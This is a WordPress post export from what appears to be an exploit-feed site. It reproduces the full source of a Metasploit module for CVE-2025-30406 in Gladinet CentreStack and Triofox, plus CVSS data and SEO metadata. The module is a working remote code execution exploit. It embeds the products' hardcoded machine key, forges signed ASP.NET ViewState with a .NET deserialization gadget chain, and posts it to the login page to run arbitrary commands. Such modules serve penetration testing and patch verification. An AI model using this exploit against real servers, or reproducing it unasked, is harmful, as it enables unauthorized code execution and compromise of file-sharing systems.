{"id":15125,"date":"2025-08-29T15:37:30","date_gmt":"2025-08-29T15:37:30","guid":{"rendered":"http:\/\/localhost\/?p=15125"},"modified":"2025-08-29T15:37:30","modified_gmt":"2025-08-29T15:37:30","slug":"gladinet-centrestacktriofox-aspnet-viewstate-deserialization","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15125","title":{"rendered":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-"},"content":{"rendered":"

{“lastseen”:”2025-08-29T19:16:06″,”description”:”A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker…”,”published”:”2025-08-29T18:53:50″,”modified”:”2025-05-28T18:51:29″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-30406″],”sourceData”:”# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n\\nrequire ‘rex\/exploit\/view_state’\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n\\n Rank = ExcellentRanking\\n\\n include Msf::Exploit::Remote::HttpClient\\n prepend Msf::Exploit::Remote::AutoCheck\\n\\n # base64 encoded machine key\\n MACHINE_KEY = ‘NTQ5NjgzMjI0MkNDMzIyOEUyOTJFRUZGQ0RBMDg5MTQ5RDc4OUUwQzREN0MxQTVEMDJCQzU0MkY3QzYyNzlCRTlERDc3MEM5RURENUQ2N0M2NkI3RTYyMTQxMUQzRTU3RUExODFCQkY4OUZEMjE5NTdEQ0RERkFDRkQ5MjZFMTY=’.freeze\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization’,\\n ‘Description’ =\\u003e %q{\\n A vulnerability in Gladinet CentreStack and Triofox application using hardcoded\\n cryptographic keys for ViewState could allow an attacker to forge ViewState data.\\n This can lead to unauthorized actions such as remote code execution.\\n Both applications make use of a hardcoded machineKey in the IIS web.config file,\\n which is responsible for securing ASP.NET ViewState data. If an attacker obtains\\n the machineKey, they can forge ViewState payloads that pass integrity checks.\\n This can result in ViewState deserialization attacks, potentially leading to\\n remote code execution (RCE) on the web server.\\n\\n Gladinet CentreStack versions up to 16.4.10315.56368 are vulnerable (fixed in 16.4.10315.56368).\\n Gladinet Triofox versions up to 16.4.10317.56372 are vulnerable (fixed in 16.4.10317.56372).\\n NOTE: There are other rebranded services that might be vulnerable and can be detected by this module.\\n },\\n ‘Author’ =\\u003e [\\n ‘Huntress Team’, # discovery and detailed vulnerability write up\\n ‘H00die Gr3y’ # this metasploit module\\n ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-30406’],\\n [‘URL’, ‘https:\/\/www.huntress.com\/blog\/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild’],\\n [‘URL’, ‘https:\/\/attackerkb.com\/topics\/7ebXn71J6O\/cve-2025-30406’]\\n ],\\n ‘Platform’ =\\u003e ‘win’,\\n ‘Targets’ =\\u003e [\\n [\\n ‘Windows Command’,\\n {\\n ‘Arch’ =\\u003e ARCH_CMD,\\n ‘Type’ =\\u003e :windows_command\\n }\\n ]\\n ],\\n ‘DefaultOptions’ =\\u003e {\\n ‘RPORT’ =\\u003e 443,\\n ‘SSL’ =\\u003e true\\n },\\n ‘DefaultTarget’ =\\u003e 0,\\n ‘DisclosureDate’ =\\u003e ‘2025-04-03’,\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION]\\n },\\n ‘Privileged’ =\\u003e false\\n )\\n )\\n\\n register_options([\\n OptString.new(‘TARGETURI’, [ true, ‘The base path to the Gladinet CentreStack or Triofox application’, ‘\/’ ])\\n ])\\n end\\n\\n def execute_command(cmd, _opts = {})\\n # get the __VIEWSTATEGENERATOR value from the vulnerable page\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘portal’, ‘loginpage.aspx’)\\n })\\n unless res\\u0026.code == 200\\n fail_with(Failure::UnexpectedReply, ‘Non-200 HTTP response received while trying to get the __VIEWSTATEGENERATOR value.’)\\n end\\n\\n html = res.get_html_document\\n if html\\n # html identifier for the __VIEWSTATEGENERATOR: \\u003cinput type=\\”hidden\\” name=\\”__VIEWSTATEGENERATOR\\” id=\\”__VIEWSTATEGENERATOR\\” value=\\”3FE2630A\\” \/\\u003e\\n generator = html.css(‘input#__VIEWSTATEGENERATOR’)[0][‘value’]\\n viewstate_generator = [generator.to_i(16)].pack(‘V’) unless generator.nil?\\n else\\n viewstate_generator = [‘3FE2630A’.to_i(16)].pack(‘V’)\\n end\\n\\n output_format = ‘raw’\\n viewstate_validation_algorithm = ‘SHA256’\\n viewstate_validation_key = [Base64.strict_decode64(MACHINE_KEY)].pack(‘H*’)\\n\\n serialized = ::Msf::Util::DotNetDeserialization.generate(\\n cmd,\\n gadget_chain: :TextFormattingRunProperties,\\n formatter: :LosFormatter\\n )\\n\\n serialized = Rex::Exploit::ViewState.generate_viewstate(\\n serialized,\\n extra: viewstate_generator,\\n algo: viewstate_validation_algorithm,\\n key: viewstate_validation_key\\n )\\n transformed = ::Msf::Simple::Buffer.transform(serialized, output_format)\\n vprint_status(transformed.to_s)\\n\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘POST’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘portal’, ‘loginpage.aspx’),\\n ‘vars_post’ =\\u003e {\\n ‘__LASTFOCUS’ =\\u003e ”,\\n ‘__VIEWSTATE’ =\\u003e transformed.to_s\\n }\\n })\\n unless res\\u0026.code == 302\\n fail_with(Failure::UnexpectedReply, ‘Non-302 HTTP response received while trying to execute the payload.’)\\n end\\n end\\n\\n def check\\n res = send_request_cgi({\\n ‘method’ =\\u003e ‘GET’,\\n ‘uri’ =\\u003e normalize_uri(target_uri.path, ‘portal’, ‘loginpage.aspx’)\\n })\\n return CheckCode::Safe(‘Failed to identify that Gladinet CentreStack\/Triofox or similar service is running.’) unless res\\u0026.code == 200 \\u0026\\u0026 res.body.include?(‘id=\\”__VIEWSTATEGENERATOR\\” value=\\”3FE2630A\\”‘)\\n\\n if res.body.include?(‘CentreStack’)\\n check_app = ‘CentreStack’\\n elsif res.body.include?(‘Triofox’)\\n check_app = ‘Triofox’\\n else\\n check_app = ‘Unknown’\\n end\\n\\n build = res.body.match(\/\\\\(Build\\\\s*.*\\\\)\/)\\n unless build.nil?\\n version = build[0].gsub(\/[[:space:]]\/, ”).split(‘Build’)[1].chomp(‘)’)\\n rex_version = Rex::Version.new(version)\\n if check_app == ‘CentreStack’\\n return CheckCode::Appears(\\”Service #{check_app} (Build #{version})\\”) if rex_version \\u003c Rex::Version.new(‘16.4.10315.56368’)\\n elsif check_app == ‘Triofox’\\n return CheckCode::Appears(\\”Service #{check_app} (Build #{version})\\”) if rex_version \\u003c Rex::Version.new(‘16.4.10317.56372’)\\n elsif check_app == ‘Unknown’\\n return CheckCode::Detected(\\”Service #{check_app} (Build #{version})\\”) if rex_version \\u003c Rex::Version.new(‘16.4.10317.56372’)\\n end\\n return CheckCode::Safe(\\”Service #{check_app} (Build #{version})\\”)\\n end\\n\\n CheckCode::Detected(\\”Service #{check_app} (Build not detected)\\”)\\n end\\n\\n def exploit\\n print_status(\\”Executing #{target.name} for #{datastore[‘PAYLOAD’]}\\”)\\n execute_command(payload.encoded)\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/windows\/http\/gladinet_viewstate_deserialization_cve_2025_30406.rb”,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/windows\/http\/gladinet_viewstate_deserialization_cve_2025_30406\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-08-29T19:16:06″,”description”:”A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker…”,”published”:”2025-08-29T18:53:50″,”modified”:”2025-05-28T18:51:29″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-30406″],”sourceData”:”# This module requires…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,169,13,7,11,5],"class_list":["post-15125","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\nGladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15125\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-08-29T19:16:06″,”description”:”A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker…”,”published”:”2025-08-29T18:53:50″,”modified”:”2025-05-28T18:51:29″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-30406″],”sourceData”:”# This module requires...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15125\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-29T15:37:30+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Gladinet CentreStack\\\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-\",\"datePublished\":\"2025-08-29T15:37:30+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125\"},\"wordCount\":1072,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15125#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125\",\"name\":\"Gladinet CentreStack\\\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-29T15:37:30+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15125\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15125#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gladinet CentreStack\\\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15125","og_locale":"en_US","og_type":"article","og_title":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem","og_description":"{“lastseen”:”2025-08-29T19:16:06″,”description”:”A vulnerability in Gladinet CentreStack and Triofox application using hardcoded cryptographic keys for ViewState could allow an attacker…”,”published”:”2025-08-29T18:53:50″,”modified”:”2025-05-28T18:51:29″,”type”:”metasploit”,”title”:”Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-30406″],”sourceData”:”# This module requires...","og_url":"https:\/\/zero.redgem.net\/?p=15125","og_site_name":"zero redgem","article_published_time":"2025-08-29T15:37:30+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"5 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15125#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15125"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-","datePublished":"2025-08-29T15:37:30+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15125"},"wordCount":1072,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15125#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15125","url":"https:\/\/zero.redgem.net\/?p=15125","name":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-29T15:37:30+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15125#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15125"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15125#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Gladinet CentreStack\/Triofox ASP.NET ViewState Deserialization_MSF:EXPLOIT-WINDOWS-HTTP-GLADINET_VIEWSTATE_DESERIALIZATION_CVE_2025_30406-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15125","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15125"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15125\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15125"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15125"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15125"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}